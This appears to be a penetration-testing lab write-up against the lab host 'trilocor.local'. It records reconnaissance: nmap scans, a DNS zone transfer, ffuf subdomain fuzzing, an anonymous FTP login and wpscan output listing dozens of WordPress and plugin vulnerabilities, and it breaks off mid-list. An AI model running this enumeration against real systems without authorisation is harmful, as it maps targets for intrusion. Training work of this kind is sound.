External Testing nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ nmap --open -oA nmap_1k trilocor.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 01:11 EST Nmap scan report for trilocor.local (10.129.170.212) Host is up (0.30s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 993/tcp open imaps 995/tcp open pop3s 7777/tcp open cbt Nmap done: 1 IP address (1 host up) scanned in 4.37 seconds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 # Nmap 7.94SVN scan initiated Thu Jan 16 02:02:25 2025 as: /usr/lib/nmap/nmap --privileged --open -p- -A -oA nmap_all trilocor.local Nmap scan report for trilocor.local (10.129.170.213) Host is up (0.41s latency). Not shown: 65524 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA) | 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA) |_ 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: WEB-NIX01, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING 53/tcp open domain (unknown banner: ISC BIND 9 (Ubuntu Linux)) | dns-nsid: |_ bind.version: ISC BIND 9 (Ubuntu Linux) | fingerprint-strings: | DNSVersionBindReqTCP: | version | bind |_ BIND 9 (Ubuntu Linux) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Trilocor – A cutting edge robotics company! |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-generator: WordPress 5.8.3 110/tcp open pop3 Dovecot pop3d |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2022-08-03T08:24:29 |_Not valid after: 2032-07-31T08:24:29 |_pop3-capabilities: SASL STLS AUTH-RESP-CODE UIDL RESP-CODES CAPA PIPELINING TOP 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 143/tcp open imap Dovecot imapd (Ubuntu) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2022-08-03T08:24:29 |_Not valid after: 2032-07-31T08:24:29 993/tcp open ssl/imap Dovecot imapd (Ubuntu) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2022-08-03T08:24:29 |_Not valid after: 2032-07-31T08:24:29 995/tcp open ssl/pop3 Dovecot pop3d |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=ubuntu | Subject Alternative Name: DNS:ubuntu | Not valid before: 2022-08-03T08:24:29 |_Not valid after: 2032-07-31T08:24:29 7777/tcp open http Werkzeug httpd 2.2.1 (Python 3.8.10) |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-server-header: Werkzeug/2.2.1 Python/3.8.10 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.94SVN%I=7%D=1/16%Time=6788AF58%P=aarch64-unknown-linux-g SF:nu%r(DNSVersionBindReqTCP,46,"\0D\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07ve SF:rsion\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x1a\x19ISC\x2 SF:0BIND\x209\x20\(Ubuntu\x20Linux\)"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=21%CT=1%CU=35304%PV=Y%DS=2%DC=T%G=Y%TM=6788 OS:AFE6%P=aarch64-unknown-linux-gnu)SEQ(TI=Z%CI=Z%II=I%TS=9)SEQ(SP=FE%GCD=1 OS:%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=FE%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS( OS:O1=M53AST11NW7%O2=M53AST11NW7%O3=M53ANNT11NW7%O4=M53AST11NW7%O5=M53AST11 OS:NW7%O6=M53AST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN( OS:R=N)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53ANNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)T7(R=N) OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D OS:FI=N%T=40%CD=S) Network Distance: 2 hops Service Info: Host: WEB-NIX01; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 524.50 ms 10.10.16.1 2 524.51 ms trilocor.local (10.129.170.213) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jan 16 02:06:14 2025 -- 1 IP address (1 host up) scanned in 229.28 seconds
Subdomain 1 2 3 4 5 6 7 8 9 10 11 12 trilocor.local www.trilocor.local blog.trilocor.local careers.trilocor.local dev.trilocor.local portal.trilocor.local pr.trilocor.local remote.trilocor.local store.trilocor.local osticketapp.trilocor.local trilocor.local www.trilocor.local blog.trilocor.local careers.trilocor.local dev.trilocor.local portal.trilocor.local pr.trilocor.local remote.trilocor.local store.trilocor.local osticketapp.trilocor.local
dig 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ dig axfr trilocor.local @10.129.170.214 ; <<>> DiG 9.20.4-2-Debian <<>> axfr trilocor.local @10.129.170.214 ;; global options: +cmd trilocor.local. 86400 IN SOA ns1.trilocor.local. dnsadmin.trilocor.local. 21 604800 86400 2419200 86400 trilocor.local. 86400 IN NS trilocor.local. trilocor.local. 86400 IN A 127.0.0.1 blog.trilocor.local. 86400 IN A 127.0.0.1 careers.trilocor.local. 86400 IN A 127.0.0.1 dev.trilocor.local. 86400 IN A 127.0.0.1 portal.trilocor.local. 86400 IN A 127.0.0.1 pr.trilocor.local. 86400 IN A 127.0.0.1 remote.trilocor.local. 86400 IN A 127.0.0.1 store.trilocor.local. 86400 IN A 127.0.0.1 trilocor.local. 86400 IN SOA ns1.trilocor.local. dnsadmin.trilocor.local. 21 604800 86400 2419200 86400 ;; Query time: 755 msec ;; SERVER: 10.129.170.214#53(10.129.170.214) (TCP) ;; WHEN: Thu Jan 16 02:21:38 EST 2025 ;; XFR size: 11 records (messages 1, bytes 338)
fuff 1 2 3 $ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.129.162.21 -H 'Host:FUZZ.trilocor.local' -fs 0,251273 osticketapp.trilocor.local
Service Enumeration SMB (All Failed) FTP 空文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ ftp anonymous@trilocor.local Connected to trilocor.local. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||47474|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 0 Sep 14 2022 Uninstaller.lnk 226 Directory send OK.
Web Enumeration eyewitness 1 eyewitness -f subdomain -d eyewitness --timeout 120
…
wpscan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 $ wpscan --url www.trilocor.local -e --api-token xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.27 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]n [+] URL: http://www.trilocor.local/ [10.129.170.214] [+] Started: Thu Jan 16 05:36:38 2025 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] WordPress version 5.8.3 identified (Insecure, released on 2022-01-06). | Found By: Emoji Settings (Passive Detection) | - http://www.trilocor.local/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.3' | Confirmed By: Meta Generator (Passive Detection) | - http://www.trilocor.local/, Match: 'WordPress 5.8.3' | | [!] 33 vulnerabilities identified: | | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery | Fixed in: 5.8.4 | References: | - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09 | - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/ | | [!] Title: WordPress < 5.9.2 / Gutenberg < 12.7.2 - Prototype Pollution via Gutenberg’s wordpress/url package | Fixed in: 5.8.4 | References: | - https://wpscan.com/vulnerability/6e61b246-5af1-4a4f-9ca8-a8c87eb2e499 | - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/ | - https://github.com/WordPress/gutenberg/pull/39365/files | | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting | Fixed in: 5.8.5 | References: | - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be | - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/ | | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting | Fixed in: 5.8.5 | References: | - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0 | - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/ | | [!] Title: WP < 6.0.2 - SQLi via Link API | Fixed in: 5.8.5 | References: | - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f | - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/ | | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283 | | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095 | | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44 | | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc | | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0 | | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef | | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955 | | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8 | | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f | | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492 | | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e | | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg | Fixed in: 5.8.6 | References: | - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9 | - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/ | - https://github.com/WordPress/gutenberg/pull/45045/files | | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding | References: | - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590 | - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/ | | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files | Fixed in: 5.8.7 | References: | - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745 | - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/ | | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF | Fixed in: 5.8.7 | References: | - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532 | - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/ | | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery | Fixed in: 5.8.7 | References: | - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5 | - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/ | | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data | Fixed in: 5.8.7 | References: | - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89 | - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/ | - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/ | | [!] Title: WP < 6.2.1 - Contributor+ Content Injection | Fixed in: 5.8.7 | References: | - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670 | - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/ | | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests | Fixed in: 5.8.8 | References: | - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2 | - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/ | | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning | Fixed in: 5.8.8 | References: | - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f | - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/ | | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution | Fixed in: 5.8.8 | References: | - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59 | - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/ | | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure | Fixed in: 5.8.8 | References: | - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999 | - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/ | | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure | Fixed in: 5.8.8 | References: | - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561 | - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/ | - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/ | | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data | Fixed in: 5.8.9 | References: | - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225 | - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/ | | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload | Fixed in: 5.8.9 | References: | - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a | - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API | Fixed in: 5.8.10 | References: | - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28 | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block | Fixed in: 5.8.10 | References: | - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ | | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block | Fixed in: 5.8.10 | References: | - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c | - https://wordpress.org/news/2024/06/wordpress-6-5-5/ [+] WordPress theme in use: astra | Location: http://www.trilocor.local/wp-content/themes/astra/ | Latest Version: 4.8.10 | Last Updated: 2025-01-07T00:00:00.000Z | Style URL: http://www.trilocor.local/wp-content/themes/astra/style.css | | Found By: Urls In Homepage (Passive Detection) | | [!] 2 vulnerabilities identified: | | [!] Title: Astra < 4.6.9 - Contributor+ Stored XSS | Fixed in: 4.6.9 | References: | - https://wpscan.com/vulnerability/62871f3a-c9a8-49bb-b67b-143af3caa986 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2347 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed914e67-4cf7-49b1-96be-ed8c604e6dce | | [!] Title: Astra < 4.6.5 - Editor+ Stored XSS via Theme Header/Footer | Fixed in: 4.6.5 | References: | - https://wpscan.com/vulnerability/30fd2612-91f6-4c1b-8d0c-fa607edf4717 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29768 | - https://patchstack.com/database/vulnerability/astra/wordpress-astra-theme-4-6-4-cross-site-scripting-xss-vulnerability | | The version could not be determined. [+] Enumerating Vulnerable Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] elementor | Location: http://www.trilocor.local/wp-content/plugins/elementor/ | Last Updated: 2025-01-15T16:20:00.000Z | [!] The version is out of date, the latest version is 3.26.5 | | Found By: Urls In Homepage (Passive Detection) | | [!] 16 vulnerabilities identified: | | [!] Title: Elementor < 3.5.6 - DOM Reflected Cross-Site Scripting | Fixed in: 3.5.6 | References: | - https://wpscan.com/vulnerability/9758570b-4729-4eef-ad52-b6e922f536d6 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29455 | - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor | | [!] Title: Elementor Website Builder < 3.12.2 - Admin+ SQLi | Fixed in: 3.12.2 | References: | - https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0329 | | [!] Title: Elementor Website Builder < 3.13.2 - Missing Authorization | Fixed in: 3.13.2 | Reference: https://wpscan.com/vulnerability/0b68091c-6a05-4f81-a718-6ec139df2e96 | | [!] Title: Elementor < 3.5.5 - Iframe Injection | Fixed in: 3.5.5 | References: | - https://wpscan.com/vulnerability/8273357e-f9e1-44bc-8082-8faab838eda7 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4953 | - https://github.com/elementor/elementor/commit/292fc49e0f979bd52d838f0326d1faaebfa59f5e | | [!] Title: Elementor Website Builder < 3.16.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via get_inline_svg() | Fixed in: 3.16.5 | References: | - https://wpscan.com/vulnerability/62b53acf-6551-4ea7-8727-039a3c9ba7ce | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47505 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/b44ef21f-464e-487a-ba5a-fe889e4c488c | | [!] Title: Elementor Website Builder < 3.16.5 - Missing Authorization to Arbitrary Attachment Read | Fixed in: 3.16.5 | References: | - https://wpscan.com/vulnerability/e60f0f7e-4c3b-4107-803a-8e03526859ed | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47504 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/c873c76a-144e-4945-8fa2-c9ffe0e3c061 | | [!] Title: Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import | Fixed in: 3.18.2 | References: | - https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48777 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b6d0a38-ac28-41c9-9da1-b30b3657b463 | | [!] Title: Elementor < 3.19.1 - Authenticated(Contributor+) Arbitrary File Deletion and PHAR Deserialization | Fixed in: 3.19.1 | References: | - https://wpscan.com/vulnerability/4d7dfcc6-8c32-4e0d-b3bb-7e2685916e2b | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24934 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/4915b769-9499-40ac-835e-279e3a910558 | | [!] Title: Elementor Website Builder – More than Just a Page Builder < 3.19.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via get_image_alt | Fixed in: 3.19.0 | References: | - https://wpscan.com/vulnerability/57af46d9-9a26-4085-9829-e0add7893332 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0506 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/4473d3f6-e324-40f5-b92b-167f76b17332 | | [!] Title: Elementor Website Builder < 3.20.3 - Contributor+ DOM Stored XSS | Fixed in: 3.20.3 | References: | - https://wpscan.com/vulnerability/22e8d017-79f5-40c8-8a2c-e0ee42ba80c8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2117 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8d7448a-b8a6-4b0b-92df-a15272fc56bf | | [!] Title: Elementor Website Builder < 3.21.6 - Contributor+ DOM Stored XSS | Fixed in: 3.21.6 | References: | - https://wpscan.com/vulnerability/8b8f30d6-bd11-4155-bfd2-3ac15248382b | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4619 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/c7e1028e-e04b-46c4-b574-889d9fc1069d | | [!] Title: Elementor Website Builder < 3.22.2 - Contributor+ Arbitrary SVG Download | Fixed in: 3.22.2 | References: | - https://wpscan.com/vulnerability/e6d56be1-9a2a-426f-88ca-1ffa773622c1 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37437 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/f11bc707-2465-4b64-945a-c0db6e9043dd | | [!] Title: Elementor Website Builder – More than Just a Page Builder < 3.24.0 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets | Fixed in: 3.24.0 | References: | - https://wpscan.com/vulnerability/5200943b-5e07-4342-a090-f78435e30d30 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5416 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5 | | [!] Title: Elementor < 3.24.6 - Contributor+ Information Exposure via get_image_alt | Fixed in: 3.24.6 | References: | - https://wpscan.com/vulnerability/dce5ad0c-3ce9-498f-b0f7-8dfd6ee82e40 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6757 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/96fa9ed7-6c13-4356-8a25-8a309be2b0e9 | | [!] Title: Elementor Website Builder < 3.25.8 - Contributor+ Stored XSS | Fixed in: 3.25.8 | References: | - https://wpscan.com/vulnerability/78f0847b-3f59-43cf-87db-2cadda862aa3 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8236 | - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1305be5-8267-475f-b962-62e3930116e1 | | [!] Title: Elementor Website Builder < 3.25.10 - Contributor+ Stored XSS via Typography Settings | Fixed in: 3.25.10 | References: | - https://wpscan.com/vulnerability/2e05843d-1797-4da9-99ec-06376484fb32 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10453 | - 